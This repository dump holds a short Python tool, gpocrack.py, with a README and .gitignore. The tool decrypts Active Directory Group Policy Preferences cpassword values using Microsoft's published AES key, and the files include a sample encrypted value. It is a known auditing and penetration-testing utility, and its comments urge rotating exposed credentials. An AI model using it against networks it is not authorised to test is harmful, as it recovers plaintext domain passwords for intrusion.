├── .gitignore ├── README.md └── gpocrack.py /.gitignore: -------------------------------------------------------------------------------- 1 | 2 | # Created by https://www.gitignore.io/api/ao,git,python,vim,osx 3 | 4 | #!! ERROR: ao is undefined. Use list command to see defined gitignore types !!# 5 | 6 | ### Git ### 7 | *.orig 8 | 9 | 10 | ### Python ### 11 | # Byte-compiled / optimized / DLL files 12 | __pycache__/ 13 | *.py[cod] 14 | *$py.class 15 | 16 | # C extensions 17 | *.so 18 | 19 | # Distribution / packaging 20 | .Python 21 | env/ 22 | build/ 23 | develop-eggs/ 24 | dist/ 25 | downloads/ 26 | eggs/ 27 | .eggs/ 28 | lib/ 29 | lib64/ 30 | parts/ 31 | sdist/ 32 | var/ 33 | wheels/ 34 | *.egg-info/ 35 | .installed.cfg 36 | *.egg 37 | 38 | # PyInstaller 39 | # Usually these files are written by a python script from a template 40 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 41 | *.manifest 42 | *.spec 43 | 44 | # Installer logs 45 | pip-log.txt 46 | pip-delete-this-directory.txt 47 | 48 | # Unit test / coverage reports 49 | htmlcov/ 50 | .tox/ 51 | .coverage 52 | .coverage.* 53 | .cache 54 | nosetests.xml 55 | coverage.xml 56 | *,cover 57 | .hypothesis/ 58 | 59 | # Translations 60 | *.mo 61 | *.pot 62 | 63 | # Django stuff: 64 | *.log 65 | local_settings.py 66 | 67 | # Flask stuff: 68 | instance/ 69 | .webassets-cache 70 | 71 | # Scrapy stuff: 72 | .scrapy 73 | 74 | # Sphinx documentation 75 | docs/_build/ 76 | 77 | # PyBuilder 78 | target/ 79 | 80 | # Jupyter Notebook 81 | .ipynb_checkpoints 82 | 83 | # pyenv 84 | .python-version 85 | 86 | # celery beat schedule file 87 | celerybeat-schedule 88 | 89 | # dotenv 90 | .env 91 | 92 | # virtualenv 93 | .venv/ 94 | venv/ 95 | ENV/ 96 | 97 | # Spyder project settings 98 | .spyderproject 99 | 100 | # Rope project settings 101 | .ropeproject 102 | 103 | 104 | ### Vim ### 105 | # swap 106 | [._]*.s[a-v][a-z] 107 | [._]*.sw[a-p] 108 | [._]s[a-v][a-z] 109 | [._]sw[a-p] 110 | # session 
111 | Session.vim 112 | # temporary 113 | .netrwhist 114 | *~ 115 | # auto-generated tag files 116 | tags 117 | 118 | 119 | ### OSX ### 120 | *.DS_Store 121 | .AppleDouble 122 | .LSOverride 123 | 124 | # Icon must end with two \r 125 | Icon 126 | # Thumbnails 127 | ._* 128 | # Files that might appear in the root of a volume 129 | .DocumentRevisions-V100 130 | .fseventsd 131 | .Spotlight-V100 132 | .TemporaryItems 133 | .Trashes 134 | .VolumeIcon.icns 135 | .com.apple.timemachine.donotpresent 136 | # Directories potentially created on remote AFP share 137 | .AppleDB 138 | .AppleDesktop 139 | Network Trash Folder 140 | Temporary Items 141 | .apdisk 142 | 143 | # End of https://www.gitignore.io/api/ao,git,python,vim,osx 144 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # GPOCRACK.py 2 | 3 | Active Directory Group Policy Preferences cpassword cracker/decrypter. 4 | 5 | ## How to use 6 | 7 | > python gpocrack.py LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0 8 | -------------------------------------------------------------------------------- /gpocrack.py: -------------------------------------------------------------------------------- 1 | import sys 2 | import base64 3 | from Crypto.Cipher import AES 4 | 5 | if len(sys.argv) != 2: 6 | print("Incorrect amount of arguments.") 7 | print("How to use:") 8 | print("$ python {} LjFWQMzS3GWDeav7+0Q0oSoOM43VwD30YZDVaItj8e0".format(sys.argv[0])) 9 | sys.exit() 10 | 11 | cpassword = sys.argv[1] 12 | 13 | while len(cpassword) % 4 > 0: 14 | cpassword += "=" 15 | 16 | decoded_password = base64.b64decode(cpassword) 17 | 18 | # This is a Microsoft hardcoded key used to decrypt the GPO hash. 
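# AES-256 key that Microsoft published for Group Policy Preferences
# "cpassword" values. Because the key is public, a cpassword left in a policy
# XML file gives no confidentiality: treat any value this script recovers as
# exposed, rotate the credential and remove the stored password from the policy.
# Bytes literal: the AES API rejects str keys on Python 3.
key = (
    b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8'
    b'\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
)

# CBC with a fixed all-zero IV of one AES block (16 bytes), as bytes.
iv = b'\x00' * AES.block_size

# CBC can only decrypt whole blocks; fail with a clear message instead of a
# traceback when the argument is truncated or is not a cpassword at all.
if not decoded_password or len(decoded_password) % AES.block_size:
    sys.exit("cpassword does not decode to a whole number of AES blocks.")

decryption_suite = AES.new(key, AES.MODE_CBC, iv)
plain_text = decryption_suite.decrypt(decoded_password)

# Remove PKCS#7 padding. str.strip() only removes whitespace, so it left the
# padding bytes in the output (and could eat real trailing whitespace).
# bytearray() yields an int for the last byte on both Python 2 and 3.
pad_len = bytearray(plain_text)[-1]
if 1 <= pad_len <= AES.block_size and plain_text.endswith(plain_text[-1:] * pad_len):
    plain_text = plain_text[:-pad_len]

# The stored password is UTF-16LE text; decode it so the output is readable
# rather than a bytes repr with interleaved NULs. errors="replace" keeps the
# script best-effort if the input was not a genuine cpassword.
password = plain_text.decode("utf-16-le", errors="replace")

print("Password is: {}".format(password))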